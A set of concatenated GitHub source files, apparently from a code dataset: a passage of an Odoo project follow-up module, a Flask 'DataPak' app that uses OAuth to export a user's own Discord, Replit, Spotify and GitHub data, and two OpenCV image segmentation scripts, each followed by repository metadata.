l.product_id.categ_id.id in product_categs.ids and l.product_uom_qty > 0)
rec.display_app_picking_lines = True
else:
rec.app_picking_line_ids = False
rec.display_app_picking_lines = False
@api.multi
def _compute_acc_picking_line_ids(self):
out_acc_task_type = self.env.ref('of_followup.of_followup_task_type_out_acc')
out_app_task_type = self.env.ref('of_followup.of_followup_task_type_out_app')
product_categs = out_app_task_type.product_categ_ids
for rec in self:
if rec.type_id == out_acc_task_type:
rec.acc_picking_line_ids = rec.project_id.order_id.picking_ids.mapped('move_lines'). \
filtered(lambda l: not l.procurement_id and l.product_id.categ_id.id not in product_categs.ids and
l.product_uom_qty > 0)
rec.display_acc_picking_lines = True
else:
rec.acc_picking_line_ids = False
rec.display_acc_picking_lines = False
@api.onchange('type_id')
def _onchange_type_id(self):
self.state_id = False
if self.type_id and not self.predefined_task or self.force_state:
state = self.env['of.followup.task.type.state'].search(
[('task_type_id', '=', self.type_id.id), ('starting_state', '=', True)], limit=1)
if state:
self.state_id = state
@api.multi
def next_step(self):
self.ensure_one()
if self.predefined_task and not self.force_state:
            # Show a confirmation pop-up
return {
'type': 'ir.actions.act_window',
'name': "Avertissement !",
'view_type': 'form',
'view_mode': 'form',
'res_model': 'of.followup.confirm.next.step',
'target': 'new',
}
else:
            # Look for the next state
state = self.env['of.followup.task.type.state'].search(
[('task_type_id', '=', self.type_id.id), ('sequence', '>', self.state_id.sequence)], limit=1)
if state:
self.state_id = state.id
return True
@api.model
def create(self, vals):
res = super(OFFollowupTask, self).create(vals)
        # Add a message in the project chatter
self.env['mail.message'].create({
'author_id': self.env.user.partner_id.id,
'model': 'of.followup.project',
'res_id': res.project_id.id,
'type': 'comment',
'body': u"La tâche %s a été ajoutée au suivi." % res.name,
'date': fields.Datetime.now(),
})
return res
@api.multi
def write(self, vals):
res = super(OFFollowupTask, self).write(vals)
if vals.get('state_id', False):
for rec in self:
                # Add a message in the project chatter
self.env['mail.message'].create({
'author_id': self.env.user.partner_id.id,
'model': 'of.followup.project',
'res_id': rec.project_id.id,
'type': 'comment',
'body': u"La tâche %s a été passée à l'état %s." % (rec.name, rec.state_id.name),
'date': fields.Datetime.now(),
})
return res
@api.multi
def unlink(self):
for rec in self:
            # Add a message in the project chatter
self.env['mail.message'].create({
'author_id': self.env.user.partner_id.id,
'model': 'of.followup.project',
'res_id': rec.project_id.id,
'type': 'comment',
'body': u"La tâche %s a été supprimée du suivi." % rec.name,
'date': fields.Datetime.now(),
})
return super(OFFollowupTask, self).unlink()
class OFFollowupTaskType(models.Model):
_name = 'of.followup.task.type'
_description = u"Type de tâches liées au suivi des projets"
name = fields.Char(string=u"Nom", required=True)
short_name = fields.Char(string=u"Nom court", required=True)
active = fields.Boolean(string=u"Actif", default=True)
predefined_task = fields.Boolean(string=u"Tâche pré-définie", readonly=True)
state_ids = fields.One2many(
comodel_name='of.followup.task.type.state', inverse_name='task_type_id', string=u"Etats")
planning_tache_categ_ids = fields.Many2many(
comodel_name='of.planning.tache.categ', string=u"Catégories de tâches planning")
product_categ_ids = fields.Many2many(
comodel_name='product.category', string=u"Catégories d'articles")
class OFFollowupTaskTypeState(models.Model):
_name = 'of.followup.task.type.state'
_description = u"Etat des types de tâches liées au suivi des projets"
_order = 'sequence, id desc'
task_type_id = fields.Many2one(comodel_name='of.followup.task.type', string=u"Type de tâche", ondelete='cascade')
sequence = fields.Integer(string=u"Séquence")
name = fields.Char(string=u"Nom", required=True)
starting_state = fields.Boolean(string=u"Etat de départ")
final_state = fields.Boolean(string=u"Etat final")
stage_id = fields.Many2one(
comodel_name='of.followup.project.stage', string=u"En retard à partir de la période",
domain=[('code', 'not in', ['new', 'coming', 's+'])])
@api.model
def create(self, vals):
        # Handle the sequence on creation
if vals.get('task_type_id'):
other_states = self.search([('task_type_id', '=', vals.get('task_type_id'))])
if other_states:
sequence = max(other_states.mapped('sequence')) + 1
else:
sequence = 0
vals.update({'sequence': sequence})
return super(OFFollowupTaskTypeState, self).create(vals)
class OFFollowupProjectTemplate(models.Model):
_name = 'of.followup.project.template'
_description = "Modèle de suivi des projets"
name = fields.Char(string=u"Nom", required=True)
task_ids = fields.One2many(
comodel_name='of.followup.project.tmpl.task', inverse_name='template_id', string=u"Tâches")
default = fields.Boolean(string=u"Modèle par défaut")
class OFFollowupProjectTmplTask(models.Model):
_name = 'of.followup.project.tmpl.task'
_description = u"Type de tâches liées au modèle de suivi"
_order = 'sequence'
template_id = fields.Many2one(comodel_name='of.followup.project.template', string=u"Modèle de suivi")
sequence = fields.Integer(string=u"Séquence")
type_id = fields.Many2one(comodel_name='of.followup.task.type', string=u"Type de tâche", required=True)
predefined_task = fields.Boolean(string=u"Tâche pré-définie", related='type_id.predefined_task', readonly=True)
name = fields.Char(string=u"Nom", related='type_id.name', readonly=True)
class OFFollowupProjectTag(models.Model):
_name = 'of.followup.project.tag'
_description = u"Étiquette du suivi commande"
name = fields.Char(string=u"Nom", required=True)
color = fields.Integer(string=u"Index couleur")
_sql_constraints = [
('name_uniq', 'unique (name)', u"Ce nom d'étiquette existe déjà !"),
]
class OFFollowupProjectAlert(models.Model):
_name = 'of.followup.project.alert'
_description = u"Alerte du suivi commande"
name = fields.Char(string=u"Nom", required=True)
color = fields.Integer(string=u"Index couleur", default=4)
class SaleOrder(models.Model):
_inherit = 'sale.order'
of_followup_project_id = fields.Many2one(comodel_name='of.followup.project', string=u"Suivi", copy=False)
of_follow_count = fields.Integer(string=u"Nombre de suivi", compute='_compute_of_followup_count')
@api.multi
def _compute_of_followup_count(self):
for rec in self:
if rec.of_followup_project_id:
rec.of_follow_count = 1
else:
rec.of_follow_count = 0
@api.multi
def action_followup_project(self):
self.ensure_one()
followup_project_obj = self.env['of.followup.project']
ir_config_obj = self.env['ir.config_parameter']
followup_project = followup_project_obj.search([('order_id', '=', self.id)])
if not followup_project and not ir_config_obj.get_param('of.followup.migration', False):
template = self.env['of.followup.project.template'].search([('default', '=', True)])
values = {
'order_id': self.id,
'template_id': template and template[0].id or False
}
followup_project = followup_project_obj.create(values)
if followup_project.template_id:
new_tasks = []
for task in followup_project.template_id.task_ids:
vals = {'sequence': task.sequence, 'type_id': task.type_id.id, 'name': task.name}
state = self.env['of.followup.task.type.state'].search(
[('task_type_id', '=', task.type_id.id), ('starting_state', '=', True)], limit=1)
if state:
if task.predefined_task:
vals.update({'predefined_state_id': state.id})
else:
vals.update({'state_id': state.id})
new_tasks += [(0, 0, vals)]
followup_project.task_ids = new_tasks
if self._context.get('auto_followup'):
followup_project.user_id = self._context.get('followup_creator_id')
return True
else:
return {
'type': 'ir.actions.act_window',
'view_mode': 'form',
'res_model': 'of.followup.project',
'res_id': followup_project.id,
'target': 'current',
'flags': {'initial_mode': 'edit', 'form': {'action_buttons': True, 'options': {'mode': 'edit'}}},
}
else:
if self._context.get('auto_followup') or ir_config_obj.get_param('of.followup.migration', False):
return True
else:
return {
'type': 'ir.actions.act_window',
'view_mode': 'form',
'res_model': 'of.followup.project',
'res_id': followup_project.id,
'target': 'current',
}
@api.multi
    def action_confirm(self):
        res = super(SaleOrder, self).action_confirm()
        ir_config_obj = self.env['ir.config_parameter']
        if not self._context.get('order_cancellation', False) and \
                not ir_config_obj.get_param('of.followup.migration', False):
            for order in self:
                order.with_context(auto_followup=True, followup_creator_id=self.env.user.id).sudo().\
                    action_followup_project()
        return res
@api.multi
def action_view_followup(self):
self.ensure_one()
action = self.env.ref('of_followup.of_followup_project_action').read()[0]
if self.of_followup_project_id:
ctx = self._context.copy()
ctx.update({'search_default_order_id': self.id})
action['context'] = ctx
else:
action = {'type': 'ir.actions.act_window_close'}
return action
class File(dms_base.DMSModel):
_inherit = 'muk_dms.file'
@api.model
def of_get_object_partner_and_category(self, obj):
if obj._name == 'of.followup.project':
partner = obj.partner_id
categ = self.env.ref('of_followup.of_followup_project_file_category')
else:
partner, categ = super(File, self).of_get_object_partner_and_category(obj)
return partner, categ
@api.multi
def action_view_linked_record(self):
result = super(File, self).action_view_linked_record()
if self.of_file_type == 'related' and self.of_related_model == 'of.followup.project':
result['view_id'] = self.env.ref('of_followup.of_followup_project_form_view').id
return result
| odof/openfire | of_followup/models/of_followup.py | of_followup.py | py | 70,070 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "odoo.models.Model",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "odoo.models",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "odoo.api.model",
... |
2391690633 | from threading import Thread
from flask import Flask, request, redirect, session, render_template, send_file, Response, flash
from flask_session import Session
import os, json
from bs4 import BeautifulSoup, SoupStrainer
import requests, lxml, cchardet
app = Flask(__name__)
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
from requests_oauthlib import OAuth2Session
import getpass
import random, string, asyncio
import shutil
app.config['GITHUB_CLIENT_ID'] = os.environ['GITHUB_CLIENT_ID']
app.config['GITHUB_CLIENT_SECRET'] = os.environ['GITHUB_CLIENT_SECRET']
# Disable SSL requirement
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
# Settings for your app
base_discord_api_url = 'https://discordapp.com/api'
client_id = os.environ['DISCORD_CLIENT_ID'] # Get from https://discordapp.com/developers/applications
client_id.encode('unicode_escape')
client_secret = os.environ['DISCORD_CLIENT_SECRET']
redirect_uri='https://DataPak.coolcodersj.repl.co/oauth_callback'
scope = ['identify', 'email', 'connections', 'guilds', 'applications.builds.read']
token_url = 'https://discord.com/api/oauth2/token'
authorize_url = 'https://discord.com/api/oauth2/authorize'
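# Standard OAuth2 authorization-code flow for Discord (as implemented below): /discord redirects the
# user to Discord's authorize URL, Discord calls back /oauth_callback with a code, and the code is
# exchanged for an access token that is kept in the Flask session.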
app.secret_key = os.environ['APP_SECRET_KEY'].encode('utf-8')
@app.route("/")
def home():
if 'discord_token' not in session.keys():
disc = ""
else:
discord = OAuth2Session(client_id, token=session['discord_token'])
response = discord.get(base_discord_api_url + '/users/@me')
disc = response.json()['username'] + "#" + response.json()['discriminator']
if not "gh_token" in session.keys():
gh = ""
else:
r = requests.get("https://api.github.com/user", headers={
"Authorization": f"token {session['gh_token']}"
})
gh = r.json()['login']
if not "spotify_token" in session.keys():
spotify = ""
else:
r = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if "error" in r.json() and r.json()['error']['message'] == "The access token expired":
spotify_client_id, spotify_client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "refresh_token",
"refresh_token": session['spotify_refresh_token'],
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': spotify_client_id,
"client_secret": spotify_client_secret
})
session['spotify_token'] = r.json()['access_token']
if "refresh_token" in r.json():
session['spotify_refresh_token'] = r.json()['refresh_token']
r = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
spotify = r.json()['display_name']
return render_template("index.html", replitusername=request.headers['X-Replit-User-Name'], discordusername=disc, gh=gh, spotify=spotify)
@app.route('/discord')
def discord():
oauth = OAuth2Session(client_id, redirect_uri=redirect_uri, scope=scope)
login_url, state = oauth.authorization_url(authorize_url)
session['state'] = state
return redirect(login_url)
@app.route("/oauth_callback")
def oauth_callback():
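  # Discord redirects here with ?code=...&state=...; fetch_token exchanges that code (taken from
  # request.url) for an access token, which is stored in the session for later API calls.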
print(type(client_id))
discord = OAuth2Session(client_id, redirect_uri=redirect_uri, state=session['state'], scope=scope)
token = discord.fetch_token(
token_url,
client_secret=client_secret,
authorization_response=request.url,
)
session['discord_token'] = token
return redirect("/")
@app.route("/discord/generate")
def gendisc():
if not 'discord_token' in session:
disc = ""
return redirect("/")
else:
discord = OAuth2Session(client_id, token=session['discord_token'])
response1 = discord.get(base_discord_api_url + '/users/@me')
response2 = discord.get(base_discord_api_url + '/users/@me/connections')
response3 = discord.get(base_discord_api_url + '/users/@me/guilds')
disc = {"account": response1.json(), "connections": response2.json(), "guilds": response3.json()}
resp = Response(json.dumps(disc))
resp.headers['Content-Type'] = 'application/json'
return resp
@app.route('/discord/info')
def discordinfo():
return render_template("discordinfo.html")
@app.route('/replit/info')
def replitinfo():
return render_template("replitinfo.html")
@app.route("/replit/generate")
def replit():
try:
username = request.headers['X-Replit-User-Name']
os.remove(f'DataPak{username}.zip')
except:
pass
globals()['replurls'] = []
def findrepls(r):
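    # Recursively scrape the public profile page for repl links: collect every repl URL on the page,
    # then follow the anchor with the jsx-688104393 class (presumably the "next page" control) until
    # there is no further page. This relies on Replit's current HTML structure, so it may break if
    # the class names change.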
global replurls
if r.status_code == 200:
soup = BeautifulSoup(r.content, "lxml")
btn = soup.find_all('a', class_='jsx-688104393')
repls = soup.find_all("a", class_='repl-item-wrapper')
for g in repls:
globals()['replurls'].append(str(g['href']))
if btn != []:
r = requests.get(f"https://replit.com{btn[0]['href']}")
findrepls(r)
else:
return
r = requests.get(f"https://replit.com/@{request.headers['X-Replit-User-Name']}")
findrepls(r)
username = request.headers['X-Replit-User-Name']
os.mkdir(f"DataPak{username}")
for repl in replurls:
r = requests.get(f'https://replit.com{repl}.zip')
f = open(f'DataPak{username}/{repl.split("/")[-1]}.zip', "w+")
print(r.content, file=f)
f.close()
r = requests.get(f"https://replit.com/data/profiles/{request.headers['X-Replit-User-Name']}").json()
f = open(f'DataPak{username}/account.json', "a")
del r['repls']
print(r, file=f)
f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/spotify/info')
def spotinfo():
return render_template('spotifyinfo.html')
@app.route('/spotify')
def spot():
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
scopes = [
'user-read-recently-played',
'user-top-read',
'user-read-playback-position',
'user-read-playback-state',
'user-read-currently-playing',
'playlist-read-private',
'playlist-read-collaborative',
'user-follow-read',
'user-follow-modify',
'user-library-read',
'user-read-email',
'user-read-private',
]
scopes = " ".join(scopes)
if not "spotify_token" in session.keys():
return redirect(f"https://accounts.spotify.com/authorize?response_type=code&client_id={client_id}&scope={scopes}&redirect_uri=https://datapak.coolcodersj.repl.co/spotify/callback")
else:
artists = requests.get("https://api.spotify.com/v1/me/following?type=artist", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if artists.text == "":
artists = {"None": "None"}
else:
if "message" in artists.json() and artists.json()['message'] == "The access token expired":
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "refresh_token",
"refresh_token": session['spotify_refresh_token'],
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': client_id,
"client_secret": client_secret
})
session['spotify_token'] = r.json()['access_token']
if "refresh_token" in r.json():
session['spotify_refresh_token'] = r.json()['refresh_token']
artists = requests.get("https://api.spotify.com/v1/me/following?type=artist", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
artists = artists.json()['artists']['items']
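    # The blocks below all use the same pagination pattern: request the first page of a library
    # endpoint, append its items, then keep following the 'next' URL returned by the Spotify API
    # until it is null.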
albums = []
album_req = requests.get("https://api.spotify.com/v1/me/albums", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in album_req.json()['items']:
albums.append(item)
while "next" in album_req.json() and album_req.json()['next'] != None:
album_req = requests.get(album_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in album_req.json()['items']:
albums.append(item)
playlists = []
playlist_req = requests.get("https://api.spotify.com/v1/me/playlists", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in playlist_req.json()['items']:
playlists.append(item)
while "next" in playlist_req.json() and playlist_req.json()['next'] != None:
playlist_req = requests.get(playlist_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in playlist_req.json()['items']:
playlists.append(item)
liked_songs = []
track_req = requests.get("https://api.spotify.com/v1/me/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
liked_songs.append(item)
while "next" in track_req.json() and track_req.json()['next'] != None:
track_req = requests.get(track_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
liked_songs.append(item)
liked_episodes = []
episode_req = requests.get("https://api.spotify.com/v1/me/episodes", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in episode_req.json()['items']:
liked_episodes.append(item)
while "next" in episode_req.json() and episode_req.json()['next'] != None:
episode_req = requests.get(episode_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in episode_req.json()['items']:
liked_episodes.append(item)
shows = []
show_req = requests.get("https://api.spotify.com/v1/me/shows", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in show_req.json()['items']:
shows.append(item)
while "next" in show_req.json() and show_req.json()['next'] != None:
show_req = requests.get(show_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in show_req.json()['items']:
shows.append(item)
top_tracks = []
track_req = requests.get("https://api.spotify.com/v1/me/top/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
top_tracks.append(item)
while "next" in track_req.json() and track_req.json()['next'] != None:
track_req = requests.get(track_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
top_tracks.append(item)
top_artists = []
artist_req = requests.get("https://api.spotify.com/v1/me/top/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in artist_req.json()['items']:
top_artists.append(item)
while "next" in artist_req.json() and artist_req.json()['next'] != None:
artist_req = requests.get(artist_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in artist_req.json()['items']:
top_artists.append(item)
current_playback = requests.get("https://api.spotify.com/v1/me/player", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if current_playback.text == '':
current_playback = {"error": "Nothing was playing while backing up."}
else:
current_playback = current_playback.json()
devices = requests.get("https://api.spotify.com/v1/me/player/devices", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if devices.text == '':
devices = {"error": "No devices available."}
else:
devices = devices.json()
recently_played = []
req = requests.get("https://api.spotify.com/v1/me/player/recently-played", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in req.json()['items']:
recently_played.append(item)
while "next" in req.json() and req.json()['next'] != None:
req = requests.get(req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in req.json()['items']:
recently_played.append(item)
profile = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
username = profile.json()['display_name']
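# Write each category of data to its own file in a per-user folder, zip the folder, and return the archive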
os.mkdir(f"DataPak{username}/")
f = open(f"DataPak{username}/library.json", "w")
print({"artists": artists, "albums": albums, "playlists": playlists, "liked_songs": liked_songs, "liked_episodes": liked_episodes, "shows": shows, "top_tracks": top_tracks, "top_artists": top_artists}, file=f)
f.close()
f = open(f"DataPak{username}/playback.json", "w")
print({"current_playback": current_playback, "devices": devices, "recently_played": recently_played}, file=f)
f.close()
f = open(f"DataPak{username}/profile.json", "w")
print(profile.json(), file=f)
f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/spotify/callback')
def spotcallback():
code = request.args.get("code")
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "authorization_code",
"type": "authorization_code",
"code": code,
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': client_id,
"client_secret": client_secret
})
session['spotify_token'] = r.json()['access_token']
session['spotify_refresh_token'] = r.json()['refresh_token']
return redirect('/')
@app.route('/github/info')
def ghinfo():
return render_template("ghinfo.html")
@app.route('/github')
def github():
if not "gh_token" in session:
state = "irajfvnqehrtdfwbejktrbnvfbiwkjetrnfgcwkjenrsflwejkbtnfjbrethvbw3urskejg"
session['state'] = state
return redirect(f"https://github.com/login/oauth/authorize?state={state}&client_id={os.environ['GITHUB_CLIENT_ID']}&scope=repo read:repo_hook read:org read:public_key gist user read:discussion read:packages read:gpg_key&redirect_uri=https://DataPak.coolcodersj.repl.co/github/callback")
else:
r = requests.get("https://api.github.com/user", headers={
"Authorization": f"token {session['gh_token']}"
})
account = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/followers", headers={
"Authorization": f"token {session['gh_token']}"
})
followers = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/following", headers={
"Authorization": f"token {session['gh_token']}"
})
following = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/gists", headers={
"Authorization": f"token {session['gh_token']}"
})
gists = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/starred", headers={
"Authorization": f"token {session['gh_token']}"
})
starred = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/subscriptions", headers={
"Authorization": f"token {session['gh_token']}"
})
watchlist = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/orgs", headers={
"Authorization": f"token {session['gh_token']}"
})
organizations = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/repo", headers={
"Authorization": f"token {session['gh_token']}"
})
repos = r.json()
os.mkdir(f"DataPak{account['login']}/")
print(account, file=open(f"DataPak{account['login']}/account.json", "w"))
print(followers, file=open(f"DataPak{account['login']}/followers.json", "w"))
print(following, file=open(f"DataPak{account['login']}/following.json", "w"))
print(gists, file=open(f"DataPak{account['login']}/gists.json", "w"))
print(starred, file=open(f"DataPak{account['login']}/starred.json", "w"))
print(watchlist, file=open(f"DataPak{account['login']}/watchlist.json", "w"))
print(organizations, file=open(f"DataPak{account['login']}/orgs.json", "w"))
print(repos, file=open(f"DataPak{account['login']}/repos.json", "w"))
username = account['login']
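# Download a zip snapshot of each repository's default branch from GitHub's archive endpoint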
for repo in repos:
name = repo['name']
branch = repo['default_branch']
r = requests.get(f'https://github.com/{username}/{name}/archive/refs/heads/{branch}.zip')
f = open(f'DataPak{username}/{name}.zip', "wb") # write the raw archive bytes
f.write(r.content)
f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/github/callback')
def authorized():
code = request.args.get("code")
r = requests.post("https://github.com/login/oauth/access_token", data={
"client_id": os.environ['GITHUB_CLIENT_ID'],
"client_secret": os.environ['GITHUB_CLIENT_SECRET'],
"code": code,
"state": session['state']
},
headers={
"Accept": "application/json"
})
session['gh_token'] = r.json()['access_token']
return redirect("/")
app.run(host="0.0.0.0", port=8080) | CoolCoderSJ/DataPak | main.py | main.py | py | 17,220 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "flask_session.Session",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"l... |
33171162837 | import matplotlib.pyplot as plt
import cv2
import numpy as np
# from pyradar.classifiers.isodata import isodata_classification
from isodataclassifier import isodata_classification
def equalize_histogram(img, histogram, cfs):
"""
Equalize pixel values to [0:255].
"""
total_pixels = img.size
N, M = img.shape
min_value = img.min()
L = 256 # Number of levels of grey
cfs_min = cfs.min()
img_corrected = np.zeros_like(img)
corrected_values = np.zeros_like(histogram)
divisor = np.float32(total_pixels) - np.float32(cfs_min)
if not divisor: # this happens when all pixel values in the image are equal
divisor = 1.0
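# Classic histogram equalization: map each grey level g to round((cdf(g) - cdf_min) / (N_pixels - cdf_min) * (L - 1))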
factor = (np.float32(L) - 1.0) / divisor
corrected_values = ((np.float32(cfs) -
np.float32(cfs_min)) * factor).round()
img_copy = np.uint64(img - min_value)
img_corrected = corrected_values[img_copy]
return img_corrected
def equalization_using_histogram(img):
# Create histogram, bin edges and cumulative distribution function
max_value = img.max()
min_value = img.min()
assert min_value >= 0, \
"ERROR: equalization_using_histogram() img have negative values!"
start, stop, step = int(min_value), int(max_value + 2), 1
histogram, bin_edge = np.histogram(img, range(start, stop, step))
cfs = histogram.cumsum() # cumulative frequency table
img_corrected = equalize_histogram(img, histogram, cfs)
return img_corrected
params = {"K": 100, "I" : 1000, "P" : 10, "THETA_M" : 10, "THETA_S" : 0.01,"THETA_C" : 8, "THETA_O" : 0.02}
img = cv2.imread('dataset/original/before.jpg',0)
# kernel = np.ones((5,5),np.uint8)
plt.imshow(img)
plt.show()
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(1,1))
# print('Before')
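# Morphological opening followed by closing with the elliptical structuring element, repeated over 7 iterations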
img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel, iterations=7)
img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel, iterations=7)
# print('Operated Image')
#plt.imshow(img)
#plt.show()
# img = cv2.imread('dataset/after.jpg',0)
# # kernel = np.ones((5,5),np.uint8)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(1,1))
# print('After')
# img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel, iterations=7)
# img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel, iterations=7)
# print("After Operated Image")
# imgplot = plt.imshow(img)
# plt.show()
# run Isodata
class_image = isodata_classification(img, parameters=params)
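# ISODATA iteratively clusters the pixel values, producing an integer class label for every pixel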
# plt.imshow(class_image);
# plt.show()
# # equalize class image to 0:255
class_image_eq = equalization_using_histogram(class_image)
# # save it
save_image(IMG_DEST_DIR, "image_eq", image_eq)
# print("Equalized image classified using histogram 1")
# imgplot = plt.imshow(class_image_eq)
# plt.show()
# # also save original image
# image_eq = equalization_using_histogram(image)
# # save it
# print("Equalized image classified using histogram 2")
# #imgplot = plt.imshow(image_eq)
# #plt.show()
| sauravkarn541/morphological_operators | isodata.py | isodata.py | py | 2,932 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros_like",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.zeros_like",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"... |
3715520265 | import cv2
import numpy as np
def get_crops(img, annotations, padding=0):
crops = []
new_img = img.copy() # Prevent drawing on original image
for a in annotations:
c = a['coordinates']
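# Annotations store a box center plus width/height; convert to corner coordinates, expanded by the optional padding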
y1, y2 = int(c['y'] - c['height'] / 2 - padding), int(c['y'] + c['height'] / 2 + padding)
x1, x2 = int(c['x'] - c['width'] / 2 - padding), int(c['x'] + c['width'] / 2 + padding)
crop = new_img[y1: y2, x1:x2]
crops.append(crop)
return crops
def segment(crops):
segs = []
for c in crops:
gray = cv2.cvtColor(c, cv2.COLOR_BGR2GRAY)
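# Otsu's method picks a global threshold automatically; THRESH_BINARY_INV inverts the resulting mask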
ret, thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)
# noise removal
kernel = np.ones((3,3),np.uint8)
opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN,kernel, iterations = 4)
# sure background area
sure_bg = cv2.dilate(opening,kernel, iterations=3)
# Finding sure foreground area
dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)
ret, sure_fg = cv2.threshold(dist_transform,0.7*dist_transform.max(),255,0)
# Finding unknown region
sure_fg = np.uint8(sure_fg)
unknown = cv2.subtract(sure_bg,sure_fg)
# Marker labelling
ret, markers = cv2.connectedComponents(sure_fg)
# Add one to all labels so that sure background is not 0, but 1
markers = markers+1
# Now, mark the region of unknown with zero
markers[unknown==255] = 0
markers = cv2.watershed(c, markers)
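# Watershed marks boundary pixels with -1; force the border rows and columns back to the background label (1)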
markers[:,[0,-1]] = markers[[0,-1]] = 1
c[markers != 1] = [255,191,0]
segs.append(c)
return segs
def draw(img, annotations, segs, padding=0):
overlay = img.copy()
for i in range(len(annotations)):
a = annotations[i]
c = a['coordinates']
y1, y2 = int(c['y'] - c['height'] / 2 - padding), int(c['y'] + c['height'] / 2 + padding)
x1, x2 = int(c['x'] - c['width'] / 2 - padding), int(c['x'] + c['width'] / 2 + padding)
overlay[y1: y2, x1:x2] = segs[i]
alpha = 0.5
cv2.addWeighted(overlay, alpha, img, 1 - alpha,0, img)
return img
| mattzh72/sframe-visualizer | tools/utils/segment.py | segment.py | py | 1,936 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.cvtColor",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "cv2.threshold",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "cv2.THRESH_BINARY_... |